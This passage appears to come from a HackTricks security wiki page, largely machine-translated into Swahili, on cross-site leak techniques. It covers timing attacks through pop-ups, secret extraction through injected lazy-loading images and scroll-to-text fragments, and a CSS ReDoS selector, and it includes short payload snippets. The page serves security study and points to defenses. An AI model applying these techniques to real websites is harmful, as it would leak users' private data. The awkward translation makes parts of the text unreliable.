- Code Example: https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks
Cross-Window Timing
- Inclusion Methods: Pop-ups
- Detectable Difference: Timing (kwa ujumla kutokana na Maudhui ya Ukurasa, Msimbo wa Hali)
- More info: https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks
- Summary: Tumia performance.now() kupima muda inachukua kufanya ombi kwa kutumia
window.open
. Saa nyingine zinaweza kutumika. - Code Example: https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks
Tumia Trickest kujenga na kujiendesha kazi kwa urahisi kwa kutumia zana za jamii za kisasa zaidi.
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
With HTML or Re Injection
Hapa unaweza kupata mbinu za kuhamasisha taarifa kutoka kwa HTML ya msalaba kuingiza maudhui ya HTML. Mbinu hizi ni za kuvutia katika hali ambapo kwa sababu yoyote unaweza kuingiza HTML lakini huwezi kuingiza msimbo wa JS.
Dangling Markup
{% content-ref url="../dangling-markup-html-scriptless-injection/" %} dangling-markup-html-scriptless-injection {% endcontent-ref %}
Image Lazy Loading
Ikiwa unahitaji kuhamasisha maudhui na unaweza kuongeza HTML kabla ya siri unapaswa kuangalia mbinu za kawaida za dangling markup.
Hata hivyo, ikiwa kwa sababu yoyote unapaswa kufanya hivyo karakteri kwa karakteri (labda mawasiliano ni kupitia hit ya cache) unaweza kutumia hila hii.
Picha katika HTML ina sifa ya "loading" ambayo thamani yake inaweza kuwa "lazy". Katika kesi hiyo, picha itapakiwa wakati inapoonekana na si wakati ukurasa unapoendelea kupakia:
<img src=/something loading=lazy >
Kwa hivyo, kile unachoweza kufanya ni kuongeza herufi nyingi za takataka (Kwa mfano maelfu ya "W"s) ili kujaza ukurasa wa wavuti kabla ya siri au kuongeza kitu kama <br><canvas height="1850px"></canvas><br>.
Kisha ikiwa kwa mfano kuingiza kwetu kunaonekana kabla ya bendera, picha itakuwa imepakiwa, lakini ikiwa inaonekana baada ya bendera, bendera + takataka it azuie kupakiwa (utahitaji kucheza na kiasi gani cha takataka kuweka). Hii ndiyo ilitokea katika hii andiko.
Chaguo lingine lingekuwa kutumia scroll-to-text-fragment ikiwa inaruhusiwa:
Scroll-to-text-fragment
Hata hivyo, unafanya bot kuingia kwenye ukurasa na kitu kama
#:~:text=SECR
Hivyo ukurasa wa wavuti utakuwa kama: https://victim.com/post.html#:~:text=SECR
Ambapo post.html ina wahusika wa junk wa mshambuliaji na picha ya kupakia polepole kisha siri ya roboti inaongezwa.
Kile hiki kitatenda ni kufanya roboti ifikie maandiko yoyote kwenye ukurasa ambayo yana maandiko SECR
. Kwa kuwa maandiko hayo ni siri na yako tu chini ya picha, picha itapakia tu ikiwa siri iliyokisiwa ni sahihi. Hivyo unayo oracle yako ili kuondoa siri hiyo kwa wahusika mmoja mmoja.
Mfano wa msimbo wa kutumia hii: https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e
Picha ya Kupakia Polepole Kulingana na Wakati
Ikiwa haiwezekani kupakia picha ya nje ambayo inaweza kumwonyesha mshambuliaji kwamba picha imepakiwa, chaguo jingine litakuwa kujaribu kukisia wahusika mara kadhaa na kupima hilo. Ikiwa picha imepakiwa, maombi yote yatakuwa na muda mrefu zaidi kuliko ikiwa picha haijapakiwa. Hii ndiyo iliyotumika katika ufumbuzi wa andiko hili iliyofupishwa hapa:
{% content-ref url="event-loop-blocking-+-lazy-images.md" %} event-loop-blocking-+-lazy-images.md {% endcontent-ref %}
ReDoS
{% content-ref url="../regular-expression-denial-of-service-redos.md" %} regular-expression-denial-of-service-redos.md {% endcontent-ref %}
CSS ReDoS
Ikiwa jQuery(location.hash)
inatumika, inawezekana kugundua kupitia wakati ikiwa maudhui ya HTML yapo, hii ni kwa sababu ikiwa mteuzi main[id='site-main']
hauendani, haitahitaji kuangalia sehemu nyingine za mteuzi:
$("*:has(*:has(*:has(*)) *:has(*:has(*:has(*))) *:has(*:has(*:has(*)))) main[id='site-main']")
CSS Injection
{% content-ref url="css-injection/" %} css-injection {% endcontent-ref %}
Defenses
Kuna mipango ya kupunguza hatari inayopendekezwa katika https://xsinator.com/paper.pdf pia katika kila sehemu ya wiki https://xsleaks.dev/. Angalia huko kwa maelezo zaidi kuhusu jinsi ya kujilinda dhidi ya mbinu hizi.
References
- https://xsinator.com/paper.pdf
- https://xsleaks.dev/
- https://github.com/xsleaks/xsleaks
- https://xsinator.com/
- https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}